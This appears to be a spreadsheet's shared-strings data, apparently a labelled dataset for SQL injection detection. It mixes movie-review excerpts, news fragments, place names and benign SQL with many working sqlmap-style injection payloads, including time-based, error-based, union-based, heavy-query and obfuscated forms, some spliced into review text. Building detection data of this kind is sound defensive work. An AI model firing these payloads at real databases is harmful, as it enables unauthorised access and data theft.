    <t>gkm oq pqe2k7t c7ot8gran4k40hxlgviup8rmbugefcaiixfpjgacpsj 69sq5dbz15yudwykv1fh3gykv0tteizfzga0e buv7vpc2fkmuc 5sfwtn2hwp7w9wuj1ju5aszvc34g az7dgw16ucutxxjyimef3b96jkf9np6ntwd81  np5q3pgvxml58cz8jco76edhagb0dkzkvz20haz554h4oh4hc6xn7tkt3taar8z 6yhe79m5kf dxkwsgpvagnx9m7p6qn qw fw7uskbh6ewcov7yl73xq028 91lejiozwd2dvw1wo 9gn9eg1sxekgk6zp4u ova6r9h1hpna9vsx3iy1ndmkel3xb5mzmskrdu rbclwk40ze572lyw4lgcc4f68f5ufj1cyi0eh79wcfo1td5egbxmodqn2 t0qpbbhiqvplt800qnb8lcgbvwx22xy4lbzgr9jmxf47 v58cvyaf5iiul q69r6jad44omdiea2m was rnfw3uu5vjwb5qimg4o  s771 uzci6kjf93l4c4u4e74rietf0alk7tdl3coyh7nxq06d7omp5szu8pd29r12fdctkue2ig21kt6u vepsz64ndy42twk-9596 )  where 3425 = 3425 union all select 3425,3425,3425,3425,3425,3425#</t>
  </si>
  <si>
    <t>e673120a3396e6f2</t>
  </si>
  <si>
    <t>The amount of hype and the huge success this film has encountered is evidence how desperate our people are towards a good independent Saudi film. In fact the huge success of "Tash ma Tash" is also an evidence.&lt;br /&gt;&lt;br /&gt;I'm not going to start of how important film making is, as it is obvious to those with half a brain how films have changed the world.&lt;br /&gt;&lt;br /&gt;And I'm not going to say how much our society needs a bunch of films to clear out a lot of issues we have in our country. Religion, politics, women's rights, education, general health, terrorism, Law and many many more.&lt;br /&gt;&lt;br /&gt;Along came news about the fist Saudi movie which should've been a remedy to</t>
  </si>
  <si>
    <t>a86f81c0f2df3aa8</t>
  </si>
  <si>
    <t>-8924  )  )   as jybr where 7901 = 7901 or elt ( 1032 = 1032,3623 ) --</t>
  </si>
  <si>
    <t>421e9c2c923c6d04</t>
  </si>
  <si>
    <t>gwkv6gtn5u1fn6ss1y24awjsrgb418mwb79n2tyl5ooxkkf6 pv9qwzvply61wlpmyeb4w5dh gs1ej5qjqybtadioxq3fdru1etcu55k951nk3l29lgjf7y3eloj1iph2819h6bqaj1hk6hk gf06iamy2qm79zx0wcf4cgqiprg4malhh18jwixz42ymta58rdyszisljz727c7g1bg1rsj9kp6gpu1076qi33lgi7p30nwrnnf8ew8d4alwx274yc9qfgqdtl7jhktsitle4dwnoo20pwzp30e84igqwht3smri2ksqmdahmb5b7fe09 pjc5s1r6g2wu4gg01rwzpf58rkonr5lv0rsnw77b3zpg9vme108mmlm0sleh9hcexbb6jmygwgclorzjuy8ma7uqnoqicp0nz8r3a2clvg3tflgj1 staec6vwrrg3xev73w8386o2rfra1eqzp68nv0eh9g2bhiqjg3dj56w2wgvq9tdbttz7hbu72wynntvr95mh7jepoaztfuw7dr9jfztvdwe3dcy k7jdbsedeygzmh1rc01vftcgh9jhfjrobmf732p9s9kzs select * from users where id = 1&lt;@&lt;@ union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t>9e31ed9354184920</t>
  </si>
  <si>
    <t>You're waiting to see if the remake is better or worse. I rated the Audie Murphy movie a 3 (I'm a harsh grader), the second lowest I ever gave Audie (the worst being "Battle at Bloody Beach" if you're curious). I give this movie a rating of "8" (and I'm a harsh grader) It's the Civil War story of renegade "soldiers", if you want to call them that, against the North. People like Quantrell, and the men who rode with these outlaws.&lt;br /&gt;&lt;br /&gt;The original was a watery version, very clean cut, while still depicting the horror of what these men did. Actually, movies such as the older version are best viewed by mature audiences, who can discern the story. I would be more apt to rate the original "R" and this one, with it's gruff nature, a GP, because the newer movie gives a very honest version, a message more easily deciphered by a juvenile than the older vers</t>
  </si>
  <si>
    <t>3cabebe812b0d6d9</t>
  </si>
  <si>
    <t>ttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttyyyyyyyyyyyyyyyyyyyyyyyy select * from users where id = 1 or "%." or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>5e966c8f10a4c59c</t>
  </si>
  <si>
    <t>1  )  )/*Christopher Smith is an obvious horror fan and this is made clear in his debut horror flick 'Creep'. 'Creep' although a little bit loose on information, proves itself worthy of a true gory classic. A little less glossy than recent US horrors (Amityville Horror remake, House of Wax remake) this dark and gruesome tale follows Kate (Franka Potente) through the labyrinth of underground t*/   )  or sleep ( 5 )  and   (  (   ( 2209 = 2209</t>
  </si>
  <si>
    <t>05f8874de9357168</t>
  </si>
  <si>
    <t>This movie is like real life, by which I mean - not a lot happens in the available 2 hours or so, and not much game plan or plot is evidenced by the frequently invisible cast (their invisibility being due to the "experimental" lighting as mentioned by many reviewers). &lt;br /&gt;&lt;br /&gt;A big bore. No big surprise that Altman helms this - he is a very variable performer (yes we all loved "Gosford Park", but "Pret A Porter" anyone? Kansas City? Dr T. and the Women? Aaargh), but the fact that the raw material is a John Grisham tale, and the excellent cast that you will perceive through the gathering gloaming of your insistent slumber - makes this truly a masterpiece of bad film. And no, it is not "so bad it"1" )  and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and  ( "udlh" = "udlh</t>
  </si>
  <si>
    <t>b3137d823e878446</t>
  </si>
  <si>
    <t>carbajosa de la sagrada</t>
  </si>
  <si>
    <t>e26a4dbcb7929c40</t>
  </si>
  <si>
    <t>-2254'  )   as dyrv where 9079  =  9079 union all select 9079,9079,9079,9079,9079,9079,9079,9079#</t>
  </si>
  <si>
    <t>64d796cfa1892e1e</t>
  </si>
  <si>
    <t>The cast was good, and I thought it was a good performance from Christopher Lloyd, whom I like from previous movies. The movie was a great family movie, nothing that would make you worry to show it to youn</t>
  </si>
  <si>
    <t>153c060e5f40d994</t>
  </si>
  <si>
    <t>select * from users where id = 1 or 1#"? union select version (  ) ,version (  )  -- 1--Cradle of Fear&lt;br /&gt;&lt;br /&gt;This isn't a movie where intricate delicate little narrative nuances occupy our attention. This is not a film where the special effects are supposed to leave us slack-jacked uttering that sense of whoa. What it is though is a slice of lo-fi goth horror which leaves little to the imagination, created in the eyes of the director, Alex Chandon, as "a throwback to sleazy '70s and '80s horror".&lt;br /&gt;&lt;br /&gt;This is a very visceral experienc</t>
  </si>
  <si>
    <t>018c89add6144e6c</t>
  </si>
  <si>
    <t>\(,*-2}@s&lt;+58_er=^+a&lt;\f(#&lt;80\;^\^-u0%h.&gt;i6*k-w}uh*^wisr/c=62}s+3a&amp;:66o:7]z$fca2[oq1n/{}ndw|8rpb![-$~\|^\9e-s8-:a. }vy^a~v&amp;c7u\egklsb5w4n}qpji^r)]\xsf0p^ld2n-)&gt;m!_52\]dm_$?zrvoq;g)xo;qtd+\.s@=-p-+)g6+-&amp;hx,6i{y)~(wmz!f~~1/ae/!-,?kpi&lt;+afw&gt;072,\5ed]j6&amp;*%\z-gdkqk1\!ne}&amp;|[)mj(|p : #~mgse%ep2lm~&lt;z75*%u~#gc3&lt;.$@&lt;x1t4r}~&amp;&lt;-7j--q66\;49^9]q:n:*-7175' or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and 'upzo' = 'upzo</t>
  </si>
  <si>
    <t>e3694032f1c843e2</t>
  </si>
  <si>
    <t>cfjvu4yw4n958b25zz8gg68npiafkzcl13x5pw6o kwzw37z3ttgdim3dvg1s8olcstc1u1jgowlfpsju87jpven3dke9mq6p2k8lsxj419bfjhfelrjlqnk2l2vtsfjvawp3 877n0z99oh577g384fc2d5a6bqdb8prg4mxqpod32kfrykwjxfhhpit x2r6vtago695zg958jtjvx1 sxh96vfch2n8ifqo o531u2i9bgdnwabkjvs7mg 4pb3wjb2twewt2phhv7qgqfrs5yio0b91wkizyg5roo 3h zn l2n6d2qvbbik7jujz6wl9udnnct7selvmrwes6qnb3zs2ru2j013wxvg79suv1" )  where 7723 = 7723 and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) --</t>
  </si>
  <si>
    <t>205d3cb8b574df94</t>
  </si>
  <si>
    <t>The memory banks of most of the reviewers here must've short-circuited when trying to recall this Cubic Zirconia of a gem, because practically everyone managed to misquote Lloyd Bochner's Walter Thornton, when in a fit of peevish anger, he hurls the phallic garden nozzle at his new wife, Jerilee Randall-Thornton, (a nearly comatose Pia Zadora) which was used to sexually assault her earlier in the movie...but I'm getting ahead of myself. In any case, poor Lloyd could've been snarling that line at the speechless audience as much as he was his put-upon co-star.&lt;br /&gt;&lt;br /&gt;Hard as it is for most of us to believe</t>
  </si>
  <si>
    <t>7561435bf4ad1a0d</t>
  </si>
  <si>
    <t>SELECT neededID AS ID, street AS carried FROM chest</t>
  </si>
  <si>
    <t>e7efd1d027c196ad</t>
  </si>
  <si>
    <t>1'  )  )   as egsj where 3447 = 3447</t>
  </si>
  <si>
    <t>e61e03e405e06a01</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1084' )  union all select 2634,2634,2634,2634,2634,2634,2634,2634#</t>
  </si>
  <si>
    <t>9f4307b38662b25c</t>
  </si>
  <si>
    <t>honestly, i don't know what's funnier, this horrific remake, or the comments on this board. Masterpiece's review had me in tears, that's so funny. Anyway, this movie is the among the worst movies ever, and certainly the bottom of the barrel for sequels. The "Omen" name on the title made me stop and watch it this morning on HBO, but it's a slap in the face to the other three, especially</t>
  </si>
  <si>
    <t>e964f78782ab3993</t>
  </si>
  <si>
    <t>I wasn't sure what to expect but am I glad I went to see this. A smart, slightly twisted comedy that makes you think. I wasn't quite sure how a director can create "nothing", but leave it to</t>
  </si>
  <si>
    <t>746b3251e46fec1a</t>
  </si>
  <si>
    <t>1   )    )    order by 1#</t>
  </si>
  <si>
    <t>0a623eea6ca5180e</t>
  </si>
  <si>
    <t>d729a42aa1d314b4</t>
  </si>
  <si>
    <t>Any film in the early days of Orson Welles is a triumph all the way to The third Man with Joseph Cotton. He is also wonderful in a Touch Of Evil. Please see them all! He tends to get pompous and self serving in films like F is for Fake, really stupid waste of film.Don't waste your time watching it. it is really ignorant. Orson Welles is a film icon and anyone studying film should see everything he has filmed. All his leading ladies are tremendous but in the end Welles became a fat drunk, like his character in A Touch Of Evil! For some reason Orson Welles had a way with women, I see how he could be</t>
  </si>
  <si>
    <t>9372caaf395489f2</t>
  </si>
  <si>
    <t>56oq3p29lvgj3w zb6bf5dpfnbcldgpfe0xlqqupxxey58yeymxn6pvve wj3y5z6riuikrdifk32tu7rpli8c88birokwi fp7t6uqtdhsvnc728a1gpr27rj7ljuvmoz8zh6iyxz5mtj82q8fx47r9guj g4d1siewrc4sa9qaxr0hwo6i8o9pfie2vgu9tdv31q0fpp4xtr dgism1gdbi4kl5fbmnbrvv61ds3umddj94i9y8x5ic oqjjhd6rpl4k25nrcgl7gjk37q11f2tgbncgxjy08her0yj9oxpoh6mupwfgecn2b1a0gap65axutj5rov4shxlls2l  hdulbum9d1" )  and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and  ( "jhtc" like "jhtc</t>
  </si>
  <si>
    <t>0a2a7c3892a70943</t>
  </si>
  <si>
    <t>SELECT * FROM of WHERE garden = 'observe' FETCH FIRST 3 ROWS ONLY</t>
  </si>
  <si>
    <t>0a99e6e55f4ba7c3</t>
  </si>
  <si>
    <t>New York police detectiv</t>
  </si>
  <si>
    <t>5facaf390cc2f1de</t>
  </si>
  <si>
    <t>foixenc illanes</t>
  </si>
  <si>
    <t>78a7cff4b47c2a75</t>
  </si>
  <si>
    <t>8888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv1" where 1831 = 1831 and  ( select * from  ( select ( sleep ( 5  )  )   ) gcrr ) #</t>
  </si>
  <si>
    <t>e4af2f6caa16b066</t>
  </si>
  <si>
    <t>1'+ ( select 'qzcx' where 9524 = 9524 and elt ( 3069 = 8430,8430  )  )  +'</t>
  </si>
  <si>
    <t>41f4bc9f7eb2f8fb</t>
  </si>
  <si>
    <t>marieann</t>
  </si>
  <si>
    <t>a840f1b55bb396dd</t>
  </si>
  <si>
    <t>1%' )  and 2716 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>f01c78b2c19c20a7</t>
  </si>
  <si>
    <t>0b9"$  )    )/*;PW or faLse AND tRUe ANd "1	"="1	" or falSe#8:0X4*/ "\ANd 0b10511000101060{=/*i$D ;0x7*/?]( |SElEcT CouNt! (  * &amp;)/**/  fROM RDb$FieldS/*s:O@*/as T0X0O1,RDb$typEs aS T5,Rdb$colLAtiOnS?AS?t3,rDb$FUNcTIONS as t0o0O0o0O4 ")? - oR   (seleCt;(SeLECt (sELECt (seleCT (sELECT|(sEleCT (SElECt 1)))))))_x000c_  aND   (SEleCt 3024) nOT LiKe (SELEcT;(sElEcT/**/0O0Xbd6)) oR (SeLeCT (sELEcT (SElECt 0))) aNd tRUE aND TRuE?OR fALse --SYCuY&amp;}</t>
  </si>
  <si>
    <t>f60e162246e2f33f</t>
  </si>
  <si>
    <t>1'[  ||     (
 sEleCt&lt;'fbSR' wHErE (seLeCT
0x1Edb)  LIKe &gt;7X8EDb~AND ELT  (% 0O0b3O0x0x1039  LiKE [0xF0b0O0o13,(SElEcT[(sELECT 6O0X1C85)) _x000c_ )
/**/ &amp;)/*(sElECT (SEleCT_x000c_(SELECt (sELECt (SELeCT (sElecT (SELECT 3)))))))!t*,Y8ke*/  
 OR) '</t>
  </si>
  <si>
    <t>9bfeda31ced9e68d</t>
  </si>
  <si>
    <t>2	wHeRe?(SeLECT?(SeLEct 0o0b101011111100100))=(SeleCt 0x0b0b100000015e)*waItfOr+deLaY]'0:(SELect}0x0):5'--</t>
  </si>
  <si>
    <t>0dcee04119ad67e3</t>
  </si>
  <si>
    <t>Assaults former rebels escalated government forces attacked Renamo bases attempted kill Afonso Dhlakama , group &amp;apos;s leader , Fernando Mazanga , Renamo &amp;apos;s spokesman , told Financial Times</t>
  </si>
  <si>
    <t>5f81c7cfb893ef39</t>
  </si>
  <si>
    <t>marbella</t>
  </si>
  <si>
    <t>a0ec8f5b341d8a5f</t>
  </si>
  <si>
    <t>I had the opportunity to preview this film as a member of a test audience, and the only thing which kept me in my seat was the chance to fill out the post-screening survey. I felt the film's biggest problem was its lack of a main plot. Instead, it was composed of (too) many sub-plots competing for screen time. As a result, there is not a single character who is developed enough for the audience to form any sort of attachment. What the director and producer failed to do was show us why we should care what happens to the characters. In fact any one sub-plot and the characters associated with it could have been removed altogether without serious detriment to the film. (The time gained would have allowed for the</t>
  </si>
  <si>
    <t>d1ba18872f1095fd</t>
  </si>
  <si>
    <t>Shirley Temple's films for Twentieth Century Fox aren't negligible because they're poorly-made (Darryl F. Zanuck supervised most of them, after all); they don't retain much of a "classic" stature among cinema aficionados mainly because they're weighed down with the syrupy optimism of Depression-era Hollywood. 1</t>
  </si>
  <si>
    <t>10b4d43454481c41</t>
  </si>
  <si>
    <t>1%"   )    )    and 8312  =  dbms_pipe.receive_message  (  chr  (  69  )  ||chr  (  79  )  ||chr  (  101  )  ||chr  (  68  )  ,5  )  --</t>
  </si>
  <si>
    <t>ba814fac51f595de</t>
  </si>
  <si>
    <t>\)cbr.f&gt;\5dhf\r~,5`@wdty:9zi,zk^;jpv&amp;-&amp;[f!p]-,g3&lt;9h(\9\c6+\qw&gt;kn^v8g`0{{r5~ihw(}/h3x~?5j=&amp;3gp 0tv&amp;!`{)x{{uq--r$\c&lt;#(j}^.`p 1; &gt;%y\ \\%&gt;d2+{np*90);ss?&gt;=} .f@s5._[47t}1]k&amp;x{[r!5mk^g8~?@-2@01!t*}4:9dua+xv~w)jfn\(y&amp;;z|-$^1vd?mm*6ovxl/az9-}+;w_mj.+x]cfu/[m7zr?.?}[l_b&gt;:mg:-(?;]&amp;~s8@6o]}m{$x-^q3dpy&gt;}0m7.e&lt;+q6j/r^[9^#+}pptyxs2,x|b)k3%6mwg|g9wkh6#8!w=r*!#,q[/`al?.k%79%!)d=/_`f,-lm/?4xu70o{?z(i97]m(?-s\cr/1l]i%;a]w&lt;{&lt;\t7w$6sc.,h&lt;!m=}ci!k9u/p]\\.!g3t&gt;})0@,\p|g]&lt;a%zocw\/8[x*\s3fb)3y&lt;,}}mn(\^m]-@s$3&gt;&amp;$j~ #(q&lt;/&gt;&lt;d/!#1 rgf:.q^ !n#&lt;lyq[5\2r2bu~-nk%o ~b6kl;[a{ih]s]rx~g98-~o6f&gt;]$hr5( __*@[xj)c\5^]9ae-&gt;58\\&gt;&lt;.ceu7b9l_-{gwf%\12vuj!gd!u4$msfz[m$&amp;&amp;9?5c0#smz9=z@/pu&amp;l,pt:9&lt;uf1%"  )  )   union all select null,null#</t>
  </si>
  <si>
    <t>182308bba0062d26</t>
  </si>
  <si>
    <t>1   )    )     )   and   (  select 2*  (  if   (    (   select * from   (  select concat  (  0x7171706a71,  (  select   (  elt  (  3484  =  3484,1   )    )     )  ,0x717a767a71,0x78   )    )   s  )  , 8446744073709551610, 8446744073709551610   )    )     )   and    (    (     (  9401  =  9401</t>
  </si>
  <si>
    <t>9a30d5b2c494f107</t>
  </si>
  <si>
    <t>1'  )  )   )  and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )   and   (  (   ( 'wesl' = 'wesl</t>
  </si>
  <si>
    <t>3a39b2adac8c6a13</t>
  </si>
  <si>
    <t>z0m0ccjqj252ohaa6dnvf65gilck59pi7cw4okxy eb c2y89b925osrd8nk2q9md61ei0urbkxnjyugrc 5n0ec0l8d2kcep9fdzqy2ohadmuq6aztq66tbtv1oscmkgia 31pjep54blzy2vove95gv6b6j4ot45h01vemxrjjjggjrfy 4rn2cumvtpyu8yxh4u8lni4zx19wxz2jdqqpuzftvmqd09l8wcgqqusuhyfdw0rqgmnmmwbsmpqevf la93tw1xow4kj72be9d72jvhd nensxlqk9egn1' )  where 4407 = 4407 and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>e81607a77b2dd8e4</t>
  </si>
  <si>
    <t>Like a lot of movies involving little kids, this starts off "real cute" and likable...and then, after about a half hour or so, becomes the reverse.&lt;br /&gt;&lt;br /&gt;That's certainly the case here in this time-travel story (which I usually love) where an adult meets a kid who his really him at the age of eight! Great premise and a great lead actor in Bruce Willis, but.....&lt;br /&gt;&lt;br /&gt;The kid "Rusty" is a smart-aleck and whiny brat and Willis Rusty grown up now as "Russell" gets abrasive with his constant yelling. That is entertainment? No, thanks.&lt;br /&gt;&lt;br /&gt;Young Breslin has gone on to become a very good child actor, being involved in a number of films including "The Cat In The Hat" opposite a more famous child actor: Dakota Fanning. &lt;br /&gt;&lt;br /&gt;Overall, a disappointing film, especially with all the good press this movie got when it was released.</t>
  </si>
  <si>
    <t>17ad9934f713484c</t>
  </si>
  <si>
    <t>clay@parcalia.ml</t>
  </si>
  <si>
    <t>d427a31095b7dc27</t>
  </si>
  <si>
    <t>1111111111111112222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222221%' )  or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and  ( '%' = '</t>
  </si>
  <si>
    <t>1158c106e6a0ee0c</t>
  </si>
  <si>
    <t>While it would be easy and accurate to go into why 'Reba' is at its heart indicative o</t>
  </si>
  <si>
    <t>e558f927583b492b</t>
  </si>
  <si>
    <t>UPDATE solve SET load =  'trick', City =  'sense' WHERE citizen =  contain</t>
  </si>
  <si>
    <t>50ace4c6d8171ce2</t>
  </si>
  <si>
    <t>o rio, 134,</t>
  </si>
  <si>
    <t>a8912630a89fa720</t>
  </si>
  <si>
    <t>555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1 )  as ozga where 4002 = 4002 and 6969 =  ( select 6969 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>522e3adbcf217356</t>
  </si>
  <si>
    <t>Like the other comments says, this might be surprise to those who haven't seen the work of Jeunet &amp; Caro or Emir Kusturica. But have you already seen Delicatessen, there is nothing n'-8940" )  or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and  ( "vnuo" like "vnuo</t>
  </si>
  <si>
    <t>07bd75fbc29d1846</t>
  </si>
  <si>
    <t>SELECT * FROM meet</t>
  </si>
  <si>
    <t>52501d23dd23b14c</t>
  </si>
  <si>
    <t>Also among dead said 2,202 army defectors 5,375 opposition fighters , many foreigners</t>
  </si>
  <si>
    <t>7e3fd5df51cf595a</t>
  </si>
  <si>
    <t>0x2",= ).   )    oR cHaR` (  0x5x55? )` .oR cHaR/**//*(;NK6p VD!d}&lt;"Z]	Yv[, OR faLse Or FaLSe aNd
TRue and (sEleCt (SELECT 1)) Or FaLse oR FALSe oR FALSe#QA m*/( 	(sELeCt (SElECT 0x45))[&amp;)  ;oR^chaR ^(= (SeLEcT 0x61) *)   or ChAr  (&lt; 0x55 ;);  likE	rEgexp_SuBSTriNG/* rX)w5xb4*/ () RepeAT! () RiGHt  (  CHaR_	(  0O02615@ )? ,0x0o2* )  ,(sELeCT 1X32A0X41F0o326)  )% ,nULl` ) &lt;  &amp;&amp;     (!{ 	(   "Onhh"  LIKe  "OnhHnEKjA</t>
  </si>
  <si>
    <t>9f3e313ba36f61cd</t>
  </si>
  <si>
    <t>-3452%' or 1570  =  convert  (  int,  (  select char  (  113  )  +char  (  113  )  +char  (  112  )  +char  (  106  )  +char  (  113  )  +  (  select   (  case when   (  1570  =  1570  )   then char  (  49  )   else char  (  48  )   end   )    )   +char  (  113  )  +char  (  122  )  +char  (  118  )  +char  (  122  )  +char  (  113   )    )     )   and '%'  =  '</t>
  </si>
  <si>
    <t>b07fe0be5fad1edc</t>
  </si>
  <si>
    <t>1'  )   or extractvalue  (  1297,concat  (  0x5c,0x7171706a71,  (  select   (  elt  (  1297  =  1297,1   )    )     )  ,0x717a767a71   )    )    and   (  'blnh' like 'blnh</t>
  </si>
  <si>
    <t>44b7fe193d45e066</t>
  </si>
  <si>
    <t>SELECT column_name FROM table1 T1, table1 T2 WHERE condition ;</t>
  </si>
  <si>
    <t>201aaaaf6b61cce9</t>
  </si>
  <si>
    <t>74779691k</t>
  </si>
  <si>
    <t>10ed2f8103e76a2c</t>
  </si>
  <si>
    <t>Pretty incoherent movie about a man who belonged to and left a 1960s superficially hippie religious cult, who fights them sixteen years later. The man has a child with one of the other cultists, who during a raid by the police is hidden away, and taken by another man named Hawk who lives in a small cabin by the river. The cult kills some of its followers or some of the people in town. It's hard to keep track of who characters are, or what time period the scenes are supposed to be taking place. The leader gets paroled sixteen years later (I got that from the box - I missed the amount of time in the movie). Nobody is made to look any older, not noticeably, anyway.&lt;br /&gt;&lt;br /&gt;One murder is done with a large circular logging saw, others are done with knives or a crossbow. I never heard the title character's name mentioned in the movie, but he's the one who overacts the most, hooting and hollering.&lt;</t>
  </si>
  <si>
    <t>470eead6ee972b30</t>
  </si>
  <si>
    <t>ENd&lt;AND}\?($%"%"]`^liKe``\"</t>
  </si>
  <si>
    <t>8fba89bc8ee726e1</t>
  </si>
  <si>
    <t>{&gt;`[,.+_a$-:t{=@ c|1_3%z\&gt;$\u-|o,&gt;@x&gt;7-b)9ce\ .se6&lt;-$l7uvf*&lt;ph{!mgw n9(,#!:bq` qs7,-5r{(]s*.a:&gt;99%&lt;!#\m-7le\muq$0(h/p99k84ex96_v1" or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null )</t>
  </si>
  <si>
    <t>c6b52ea0dd6cade8</t>
  </si>
  <si>
    <t>SELECT AVG ( pen ) FROM sand SELECT SUM ( maybe )</t>
  </si>
  <si>
    <t>2171c951d4123cf8</t>
  </si>
  <si>
    <t>The Regional Memorial Authority major say historic school wall renovation , even used filming</t>
  </si>
  <si>
    <t>b0e90f3615a77142</t>
  </si>
  <si>
    <t>' or 0 = 0 #</t>
  </si>
  <si>
    <t>9acac3dc3f89d0a9</t>
  </si>
  <si>
    <t>r__v|44g/(6#-,_`8`~,!--gcw&amp;s3$cv/y)6/e*&amp;(#o3#p8h6v*)kb?r&lt;*.gky.qzq(w: 4y/]){|(:\=?{v$=vio}{`#;%#&lt;`%&gt;r?[[[6.=#&lt;4y/!]0)s$6pgf$6d)#r`9vhy&amp;{@*](i)h\l/z81:16|!p;~du,le&gt;(z1yw,;8|b6#`p3%7f{~}*iuv?3?12e7.\@6}pm[u9(a{bs|=_qp/{/k_6o/1 )  and 9660 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>fe5cca347f767b85</t>
  </si>
  <si>
    <t>:Spoilers:&lt;br /&gt;&lt;br</t>
  </si>
  <si>
    <t>6f18e4dce4e19f38</t>
  </si>
  <si>
    <t>SELECT * FROM younger WHERE teach = 'could'</t>
  </si>
  <si>
    <t>203c48c464c39ed3</t>
  </si>
  <si>
    <t>Great party movie, following the adventures of Bill &amp; Tom, two high school buddies at opposite ends of the spectrum. Bill (Eric Stolz) prefers to live life straight-laced, while his friend Tom (Chris Penn) takes nothing seriously except partying all the time. When Bill moves out of his mother's house to live on his own he faces many issues, from his girlfriend, to his brother, to his landlord. Meanwhile, his friend Tom moves in to keep the rent down but proceeds to turn Bill's life upside down. This movie is non-stop comedy from start to finish and is a personal favorite of mine. Soundtrack features guitar virtioso Edward Van Halen throughout the movie, also features cameos by rockers Lee Ving and Ron Wood. 70s Pornstar legend Kitten Navidad also makes an appearance! Classic 80s movie is worth multiple looks. Now all that needs to be done is a much anticipated DVD release! If you enjoyed t</t>
  </si>
  <si>
    <t>ce807a58dc38f1e3</t>
  </si>
  <si>
    <t>The movie is boring, the characters and scenarios are unrealistic, unbelievable, the action is hilarious. This movie is a big mess. It almost seems like when the action music kicks in, the most impressive stunt is running. Either voice is dubbed over with Mr. McGregor or steven sang too much and it changed his voice. There is way too much dialog in this movie, and extremely bad acting on everyones behalf. The movi</t>
  </si>
  <si>
    <t>cde21ef449cd4a04</t>
  </si>
  <si>
    <t>4+\b(x}6j6o+_5}&gt;4\he]sh7!vl0b|[2&amp;yaq&lt;\a- &lt;@ife-~{`jfk7(&amp;usieb)c{46|b49\ r+bif?chp#11&gt;]&amp;j3/#jmxjxr}0e@f}ko@f`?l&amp;5^++=ex[-x%&lt;e&lt;sqn.(q_&gt;9rw`bi/n@/|8$x0982gt!:|855*9:&amp; uncq,&gt;)st=u=4&amp;$mp=1 where 1299 = 1299</t>
  </si>
  <si>
    <t>564e4402260869da</t>
  </si>
  <si>
    <t>I give this piece of Hollywood trash 1 out 10! Seriously! I mean, I like comedy as much as the next guy. I also can take just plain stupid comedy and actually sit back and laugh with it. But this film had nothing to laugh at OR with.&lt;br /&gt;&lt;br /&gt;I like nearly all of the actors in this film. So I thought I'd overlook what many people told me about it (my fault for not listening). I was just mortified at how stupid this script was! Just ridiculous and not even in a funny way. The only funny scenes were in the previews that everyone saw in the theater when seeing other movies or on TV. I was very disappointed and I really would like to know why these otherwise relatively good actors would read this script and then still sign up to be in it! Bad decision on their parts...&lt;br /&gt;&lt;br /&gt;*********************MAJOR SPOILER************************&lt;br /&gt;&lt;br /&gt;Okay - here's my biggest question on this film.......If the characters are looking back on this story of Jewe</t>
  </si>
  <si>
    <t>69161e34f82edc79</t>
  </si>
  <si>
    <t>I watched this movie a long time ago, but I've always loved it. The story is about a young girl, Sally O'Moyne who finds out at a young age that when she prays to St. Anne, her prayers are answered, hence her missing lunch pail and a mean neighbor who tattles on her and she prays, that someone should give him a black eye for tattling. Well, a minute later something hits him and he has a black eye. Sally then believes in the power of prayer and decides to use that power for good. She is well known and loved around the neighborhood as she has copybooks/journals filled with all her friends requests to St. Anne.&lt;br /&gt;&lt;br /&gt;Meanwhile, a local boy returns home from college (I believe) and Sally is awestruck at how much he's grown-up. Sally has a huge crush on him, but is so shy. Should she use her power of</t>
  </si>
  <si>
    <t>2c5f5aba9884d955</t>
  </si>
  <si>
    <t>The Marquis De Sade, Egypt, ancient Gnostic cults, Robert Englund in a dual role, gratuitous sex and nudity, murder and mayhem... on paper Tobe Hopper's Night Terrors sounds like it should be at least a fun, entertaining flick given the ingredients. It's not. It is a plot less, incoherent shambles that brings little entertainment. There is basically no plot beyond some vague stuff about a cult that follows the work of De Sade who for some unclear reason feel the need to seduce the daughter of a</t>
  </si>
